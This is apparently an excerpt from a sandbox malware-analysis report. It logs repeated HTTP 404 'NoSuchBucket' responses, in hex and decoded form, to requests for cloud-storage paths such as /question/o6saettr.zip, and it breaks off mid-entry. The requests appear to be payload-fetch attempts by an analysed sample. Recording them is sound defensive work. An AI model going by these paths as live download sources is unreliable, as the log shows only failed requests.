3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>76c94694-2412-0521-2620-5ca7213e04cc</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:26:26 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 32a99b11-2412-0521-2626-b4055d752a1dx-error-code: NoSuchBucketData Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 61 39 39 62 31 31 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 32 36 2d 62 34 30 35 35 64 37 35 32 61 31 64 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>32a99b11-2412-0521-2626-b4055d752a1d</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:26:19 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 3528eba9-2412-0521-2628-6c92bfce66d4x-error-code: NoSuchBucketData Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 32 38 65 62 61 39 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 32 38 2d 36 63 39 32 62 66 63 65 36 36 64 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>3528eba9-2412-0521-2628-6c92bfce66d4</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:26:28 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 769b6110-2412-0521-2630-5ca7213e02f2x-error-code: NoSuchBucketData Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 39 62 36 31 31 30 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 33 30 2d 35 63 61 37 32 31 33 65 30 32 66 32 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>769b6110-2412-0521-2630-5ca7213e02f2</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:26:31 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 32a9dada-2412-0521-2634-b4055d752e03x-error-code: NoSuchBucketData Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 61 39 64 61 64 61 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 33 34 2d 62 34 30 35 35 64 37 35 32 65 30 33 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>32a9dada-2412-0521-2634-b4055d752e03</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:26:27 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 7671a9bf-2412-0521-2636-3868dd5cd1c8x-error-code: NoSuchBucketData Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 37 31 61 39 62 66 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 33 36 2d 33 38 36 38 64 64 35 63 64 31 63 38 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>7671a9bf-2412-0521-2636-3868dd5cd1c8</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:26:37 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 7662ae9d-2412-0521-2637-28dee5e81b8dx-error-code: NoSuchBucketData Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 36 32 61 65 39 64 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 33 37 2d 32 38 64 65 65 35 65 38 31 62 38 64 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>7662ae9d-2412-0521-2637-28dee5e81b8d</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:26:40 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 5a8f2d5c-2412-0521-2640-6c92bfce66fex-error-code: NoSuchBucketData Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 35 61 38 66 32 64 35 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 34 30 2d 36 63 39 32 62 66 63 65 36 36 66 65 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>5a8f2d5c-2412-0521-2640-6c92bfce66fe</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:26:33 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 3566a6f7-2412-0521-2642-6c92bfce68e1x-error-code: NoSuchBucketData Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 36 36 61 36 66 37 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 34 32 2d 36 63 39 32 62 66 63 65 36 38 65 31 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>3566a6f7-2412-0521-2642-6c92bfce68e1</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:26:42 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 76c330cc-2412-0521-2644-58c7acc909bcx-error-code: NoSuchBucketData Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 63 33 33 30 63 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 34 34 2d 35 38 63 37 61 63 63 39 30 39 62 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>76c330cc-2412-0521-2644-58c7acc909bc</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:26:39 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 3305a745-2412-0521-2647-b4055d752a45x-error-code: NoSuchBucketData Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 33 30 35 61 37 34 35 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 34 37 2d 62 34 30 35 35 64 37 35 32 61 34 35 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>3305a745-2412-0521-2647-b4055d752a45</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:26:47 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 54beaca1-2412-0521-2650-b4055d7078f2x-error-code: NoSuchBucketData Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 35 34 62 65 61 63 61 31 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 35 30 2d 62 34 30 35 35 64 37 30 37 38 66 32 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>54beaca1-2412-0521-2650-b4055d7078f2</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:26:52 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 3529120e-2412-0521-2652-6c92bfce66d4x-error-code: NoSuchBucketData Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 32 39 31 32 30 65 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 35 32 2d 36 63 39 32 62 66 63 65 36 36 64 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>3529120e-2412-0521-2652-6c92bfce66d4</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:26:55 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 769b74c6-2412-0521-2655-5ca7213e02f2x-error-code: NoSuchBucketData Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 39 62 37 34 63 36 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 35 35 2d 35 63 61 37 32 31 33 65 30 32 66 32 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>769b74c6-2412-0521-2655-5ca7213e02f2</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:26:57 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 76c540ba-2412-0521-2657-b4055d71257cx-error-code: NoSuchBucketData Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 63 35 34 30 62 61 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 35 37 2d 62 34 30 35 35 64 37 31 32 35 37 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>76c540ba-2412-0521-2657-b4055d71257c</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:27:03 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 3566ca88-2412-0521-2703-6c92bfce68e1x-error-code: NoSuchBucketData Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 36 36 63 61 38 38 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 30 33 2d 36 63 39 32 62 66 63 65 36 38 65 31 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>3566ca88-2412-0521-2703-6c92bfce68e1</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:27:05 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 32a9dc93-2412-0521-2705-b4055d752a1dx-error-code: NoSuchBucketData Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 61 39 64 63 39 33 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 30 35 2d 62 34 30 35 35 64 37 35 32 61 31 64 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>32a9dc93-2412-0521-2705-b4055d752a1d</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:27:08 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 765b542c-2412-0521-2708-5ca7213e0802x-error-code: NoSuchBucketData Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 35 62 35 34 32 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 30 38 2d 35 63 61 37 32 31 33 65 30 38 30 32 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>765b542c-2412-0521-2708-5ca7213e0802</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:27:01 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 769b7fff-2412-0521-2710-5ca7213e02f2x-error-code: NoSuchBucketData Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 39 62 37 66 66 66 2d 32 34 31 32 2d 30 35 